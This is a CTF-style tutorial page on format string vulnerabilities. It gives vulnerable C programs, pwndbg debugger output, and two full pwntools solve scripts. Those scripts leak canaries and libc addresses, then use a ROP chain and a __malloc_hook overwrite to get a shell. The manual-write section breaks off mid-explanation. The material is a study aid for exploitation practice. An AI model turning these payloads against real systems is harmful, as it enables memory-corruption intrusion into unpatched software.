Format String Bug
Abusing format string specifiers to leak and write addresses
TLDR
Requirements
Use of printf
that is directly passed user-supplied input
What can you do with this?
Arbitrary Read - use %p
format specifiers to leak pointers on the stack, potentially revealing interesting information (E.g libc addresses, variables)
Arbitrary Write - determine what pointers you want to overwrite on the stack and utilize the %n
format specifier to do so
Arbitrary Read
Identifying this vulnerability is relatively straightforward: we aim to find user-supplied input that is passed directly to printf as its format string.
The example below is from DownUnderCTF2020 and will be the main challenge we are referencing throughout this page.
#include <stdio.h>
/* Size of the stack buffer, and the maximum number of bytes fgets() reads per round. */
#define INPUT_SIZE 64
/* Number of read-then-print rounds main() performs. */
#define INPUT_TIMES 3
/* Runs before main() (constructor attribute): switches stdout and stdin to
   buffering mode 2, which is _IONBF (unbuffered) on glibc. */
__attribute__((constructor))
void setup() {
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
}
/* Reads a line into buffer and echoes it back, INPUT_TIMES times in total. */
int main() {
char buffer[INPUT_SIZE];
int i;
for (i = 0; i < INPUT_TIMES; i++) {
fgets(buffer, INPUT_SIZE, stdin);
/* Vulnerable call: the user-controlled buffer is used as the format string itself. */
printf(buffer);
}
return 0;
}
We see that our user input is directly passed into printf
and we can verify this by using the format specifier %p
which is used to display pointers.

To specifically reference a certain offset (E.g Offset 8), we can use the %offset$p
to print the specific stack pointer value.

This can be used to leak a lot of useful information for stack exploitation, such as stack canaries, libc addresses and more.
pwndbg> c
Continuing.
%19$p
0x7ffff7821b97
Breakpoint 2, 0x0000555555400866 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────
*RAX 0xf
RBX 0x0
RCX 0x0
RDX 0x7ffff7bed8c0 ◂— 0x0
RDI 0x1
RSI 0x7fffffffbc10 ◂— '0x7ffff7821b97\n'
*R8 0xf
*R9 0x7fffffffba8c ◂— 0xf00007fff
R10 0x0
R11 0x246
R12 0x5555554006d0 (_start) ◂— xor ebp, ebp
R13 0x7fffffffe3f0 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x7fffffffe310 —▸ 0x555555400890 (__libc_csu_init) ◂— push r15
RSP 0x7fffffffe2b0 —▸ 0x7fffffffe2d0 ◂— 0x2
RIP 0x555555400866 (main+73) ◂— add dword ptr [rbp - 0x54], 1
───────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────
► 0x555555400866 <main+73> add dword ptr [rbp - 0x54], 1
0x55555540086a <main+77> cmp dword ptr [rbp - 0x54], 2
0x55555540086e <main+81> jle main+32 <main+32>
0x555555400870 <main+83> mov eax, 0
0x555555400875 <main+88> mov rcx, qword ptr [rbp - 8]
0x555555400879 <main+92> xor rcx, qword ptr fs:[0x28]
0x555555400882 <main+101> je main+108 <main+108>
↓
0x555555400889 <main+108> leave
0x55555540088a <main+109> ret
0x55555540088b nop dword ptr [rax + rax]
0x555555400890 <__libc_csu_init> push r15
────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe2b0 —▸ 0x7fffffffe2d0 ◂— 0x2
01:0008│ 0x7fffffffe2b8 ◂— 0x255600d98
02:0010│ 0x7fffffffe2c0 ◂— 0xa7024393125 /* '%19$p\n' */
03:0018│ 0x7fffffffe2c8 —▸ 0x55555540081a (setup+64) ◂— nop
04:0020│ 0x7fffffffe2d0 ◂— 0x2
05:0028│ 0x7fffffffe2d8 —▸ 0x5555554008dd (__libc_csu_init+77) ◂— add rbx, 1
06:0030│ 0x7fffffffe2e0 —▸ 0x7ffff7c109a0 ◂— push rbp
07:0038│ 0x7fffffffe2e8 ◂— 0x0
──────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────
► 0 0x555555400866 main+73
1 0x7ffff7821b97 __libc_start_main+231
2 0x5555554006fa _start+42
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> address 0x7ffff7821b97
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x7ffff7800000 0x7ffff79e7000 r-xp 1e7000 0 /home/kali/Desktop/Practice/BinaryExploit/malloc_hook_fsb/libc.so.6 +0x21b97
pwndbg>
As you can see above, we are able to leak a libc address 0x7ffff7821b97
.
Assuming you know at which offset your input is, you could also leak the contents of an arbitrary pointer by specifying the %s
. Here is an example from WWCTF.
// Decompiler output for slip(): reads up to 0x1D bytes from fd 0 into v1 and
// then passes v1 to printf() as the format string.
unsigned __int64 slip()
{
char v1[40]; // [rsp+0h] [rbp-38h] BYREF
unsigned __int64 v2; // [rsp+28h] [rbp-10h]
// Save the qword at fs:0x28 (the stack canary) so it can be compared at return.
v2 = __readfsqword(0x28u);
puts("\nTry to slip...\nRight or left?");
read(0, v1, 0x1DuLL);
// Format string bug: v1 is attacker-controlled and is used directly as the format.
printf(v1);
// Zero when the saved value still matches fs:0x28, non-zero otherwise.
return v2 - __readfsqword(0x28u);
}
We have a simple printf
vulnerability here and using the %s
format specifier, we can dereference arbitrary memory addresses. To get a LIBC leak, we can provide the puts@GOT
address, which when dereferenced will give us the actual runtime address of puts
in libc.
Below is an excerpt of my solve script where this was used to leak the libc base.
#!/usr/bin/env python3
"""Excerpt of the buffer_brawl solve script.

Stages: leak the stack canary and the binary base with %p, leak puts@GOT
with %s to recover the libc base, then overflow the stack with a ROP chain
that calls system("/bin/sh").
"""
from pwn import *

exe = ELF("./buffer_brawl_patched")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.binary = exe
context.log_level = 'debug'


def main():
    """Run the exploit against a local process and hand over an interactive shell."""
    p = process('./buffer_brawl_patched')
    gdb.attach(p, gdbscript='break *stack_check_up + 157')

    # Stage 1: menu option 4 leads to the "Right or left?" prompt whose input
    # is printed with printf(); dump two stack slots in one go.
    p.recvuntil(b'> ')
    p.sendline(b'4')
    p.recvuntil(b'Right or left?\n')
    p.sendline(b'%11$p.%13$p')
    leak = p.recvline().strip(b'\n')
    fields = leak.split(b'.')
    canary = int(fields[0], 16)
    # The value at offset 13 is treated as a code pointer 0x1747 bytes past
    # the binary's load address.
    binary_base = int(fields[1], 16) - 0x1747
    log.info(f"Canary is {hex(canary)}")
    log.info(f"Base is {hex(binary_base)}")

    # Rebase the ELF so that exe.got[...] yields runtime addresses.
    exe.address = binary_base
    log.info(f"Puts is {hex(exe.got['puts'])}")

    # Stage 2: leak puts@GOT. The format is padded to 8 bytes so the address
    # that follows sits in its own stack slot, which %7$s then dereferences.
    p.recvuntil(b'> ')
    p.sendline(b'4')
    p.recvuntil(b'Right or left?\n')
    payload = b'%7$s\x00\x00\x00\x00' + p64(exe.got['puts'])
    p.sendline(payload)
    leak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
    # NOTE(review): these constants are the distance from the leaked puts
    # address to the libc base for the libc this was solved against; they are
    # libc-build specific.
    libc_base = leak - 163840 - 358240
    log.info(f"Libc is {hex(libc_base)}")

    # Trigger BOF criteria: pick menu option 3 twenty-nine times.
    for _ in range(29):
        p.recvuntil(b'> ')
        p.sendline(b'3')

    libc.address = libc_base
    system = libc.sym['system']
    # NOTE(review): hard-coded libc offsets below ("/bin/sh" string and the
    # pop rdi gadget) are presumably tied to the same libc build - confirm.
    binsh = libc.address + 0x1a7e43
    log.info(f"/bin/sh is {hex(binsh)}")
    pop_rdi = libc.address + 0x000000000002a205
    ret = binary_base + 0x0000000000001016
    offset = 24

    # BOF with canary check + system(ptr_to_bin_sh)
    payload = offset * b'A'
    payload += p64(canary)
    payload += b'A' * 8          # saved rbp
    payload += p64(pop_rdi)
    payload += p64(binsh)
    payload += p64(ret)          # extra ret before system (stack alignment)
    payload += p64(system)
    payload += p64(ret)
    p.recvuntil(b'Enter your move: ')
    p.clean()
    p.sendline(payload)
    p.interactive()


if __name__ == "__main__":
    main()
%s
prints until it reaches a null byte \x00
so this can also be useful when leaking canaries, assuming you have control over the buffer that is being printed. Below is an example.
switch (idx) {
case 1:
if (pthread_create(&thread_t, NULL, thread_routine, NULL) < 0) {
perror("thread create error");
exit(0);
}
break;
case 2:
printf("Size: ");
scanf("%lu", &size);
printf("Data: ");
read_bytes(global_buffer, size);
// Global buffer is filled with b'A's, so the first null byte it meets is
// the canary as the canary is <7 bytes>/x00 always
printf("Data: %s", global_buffer);
break
Arbitrary Write
Printf's %n
specifier takes in a pointer and stores the number of characters printed so far at that address.
Lets take this program for example.
#include <stdio.h>

/* Demonstrates %n: printf stores the number of characters it has emitted so
   far into the int that the matching argument points to. */
int main(void)
{
    int c;

    /* "geeks for " is 10 characters long, so %n stores 10 into c. */
    printf("geeks for %ngeeks ", &c);
    printf("%d", c);

    /* Wait for a key press before exiting. */
    getchar();
    return 0;
}
%n
will store the value 10 into the variable c as there were 10 characters printed before %n
was called.
So if we have control of the input, we can have an arbitrary write with %n
.
This can be further automated with the use of pwntools fmtstr_payload
function
# offset:   index of the first printf argument that falls inside our input buffer
# location: address to overwrite; value: what to store there (a dict of address -> value)
payload = fmtstr_payload(offset, {location : value})
Lets see how we can leverage on printf
only to obtain a shell.
#!/usr/bin/env python3
"""Exploit for the echos challenge using nothing but its three printf(buffer) calls.

Round 1 leaks a libc address, round 2 overwrites __malloc_hook with a
one_gadget, round 3 sends a huge field width to fire the hook.
"""
from pwn import *

exe = ELF("./echos_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")

context.update(arch='amd64', os='linux')

io = process("./echos_patched")

# Round 1: offset 19 holds 0x7ffff7821b97 in the debugger session, i.e.
# __libc_start_main+231 == libc.so.6 + 0x21b97, so subtracting 0x21b97 gives
# the libc base.
io.sendline(b'%19$p')
leaked_ret = int(io.recvline(), 16)
libc.address = leaked_ret - 0x21b97
log.info(f"Libc Address Leak : {hex(libc.address)}")

hook_addr = libc.symbols["__malloc_hook"]
log.info(f"malloc_hook address : {hex(hook_addr)}")

# Round 2: store the one_gadget address in __malloc_hook; our buffer starts at
# printf offset 8.
gadget_addr = libc.address + 0x4f322
log.info(f"one_gadget address : {hex(gadget_addr)}")
io.sendline(fmtstr_payload(8, {hook_addr: gadget_addr}, write_size="int"))
pause()

# Round 3: a huge field width triggers __malloc_hook.
io.sendline(b'%66000c')
io.interactive()
We perform a stack leak with printf using the
%p
format specifier to list out the values on the stack. Since we know that we need a libc leak, we target the 19th offset using the format %offset$p
Using the libc leak, we are able to get the address of
__malloc_hook
which will be useful as printf calls malloc
We can then write the address of a one_gadget into &__malloc_hook using pwntools's
fmtstr_payload
For our last printf call, we can trigger malloc by passing a very large field width (E.g passing
%65510c
), which triggers malloc()
, which in turn triggers __malloc_hook
, calling our one_gadget and giving us a shell
Let's look at an example where pwntools cannot save us and we have to do a manual write.
#include <cstdio>
#include <stdlib.h>
// Filter applied to the input before it is passed to printf().
// Scans the first 384 bytes of s; every '%' must be followed by a decimal
// number that does not start with '0', has at least two digits, and is
// below 58. Returns true only if every '%' passes.
bool check(char* s) {
char tmp[384] = {0,};
// cnt and run are written but never read in this function.
int i = 0, j = 0, cnt = 0;
bool run = false;
for (; i < 384; i++) {
j = 0;
if (s[i] != '%') continue;
cnt += 1;
// Step onto the character right after the '%'.
i += 1;
if (s[i] == '0') {
// don't waste space!!
return false;
}
// Copy the run of decimal digits that follows into tmp.
while (s[i] >= '0' && s[i] <= '9') {
tmp[j] = s[i];
i += 1;
j += 1;
}
// Fewer than two digits (including none at all) is rejected.
if (j <= 1) {
return false;
}
tmp[j] = 0;
// tmp's own address is passed as endptr, so strtol stores the end pointer
// into the start of tmp after parsing; only the returned value is used.
int fmt_val = strtol(tmp, (char**)(&tmp), 10);
if (fmt_val >= 58) {
return false;
}
// The loop's i++ now steps past the first non-digit character after the number.
}
return true;
}
// Prompt loop: reads a line into s and, if check(s) accepts it, uses s
// directly as the printf format string; the first rejected line ends the loop.
int main(int argc, char** argv, char** envp) {
// Disable buffering on all three standard streams.
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
char s[384] = {0,};
while(1) {
printf(">> ");
fgets(s, 384, stdin);
// Format string bug: user input is the format, gated only by check().
if (check(s)) printf(s);
else break;
}
return 0;
}
// gcc chall.cpp -o chall -O0 -Wno-format-security -Wl,-z,relro,-z,lazy -no-pie
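The first thought is to just do a simple GOT overwrite with a one_gadget, but check() (via strtol)
requires the number after every % to have at least two digits and be less than 58 after a %
character. This means that if we use %<no of char>c%offset$hhn
, a single padding specifier can only add 10-57 characters to the count, so one write on its own can only store a value in the range 10-57.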
S
Misc Stuff
To determine if the value you leaked is a libc address, just use the
address()
function in pwndbg and check for rwx with vmmap
On x86-64, printf offsets 1 to 5 correspond to register arguments (RSI, RDX, RCX, R8, R9), so stack memory, including the buffer containing your input, can only show up from offset 6 onwards
printf has an internal counter of the characters printed so far, which is especially important when chaining multiple
%n
calls. This means you can do something like this
%57c%10$hhn%57c%10$hhn
== %114c%10$hhn
Last updated